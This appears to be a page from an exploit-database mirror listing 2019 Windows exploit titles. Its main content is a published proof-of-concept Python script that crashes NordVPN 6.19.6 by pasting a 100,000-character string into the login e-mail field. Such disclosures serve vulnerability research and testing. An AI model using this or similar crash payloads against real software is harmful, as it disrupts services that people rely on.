Menu

Improved exploit search engine. Try python and hit enter

"NordVPN 6.19.6 - Denial of Service (PoC)"

Author

"Alejandra Sánchez"

Platform

windows

Release date

2019-02-11

Release Date Title Type Platform Author
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-21 "Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC)" dos windows "Wade Guest"
2019-02-20 "WinRAR 5.61 - '.lng' Denial of Service" dos windows "Kağan Çapar"
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-18 "mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers" remote windows ProofOfCalc
2019-02-19 "MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation" local windows "Mike Siegel"
Release Date Title Type Platform Author
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-18 "NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Denial of Service" dos windows "Alejandra Sánchez"
2019-02-14 "MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-13 "NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-11 "NordVPN 6.19.6 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2018-12-11 "SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46343/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# -*- coding: utf-8 -*-
# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC)
# Date: 07/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://nordvpn.com/
# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Version: 6.19.6
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script, it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NordVPN.exe 
# 3.- Paste clipboard in 'E-mail' field
# 4.- Write '1234' in 'Password' field
# 5.- Clic on button -> Sign In
# 6.- Crashed

buffer = "\x41" * 100000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()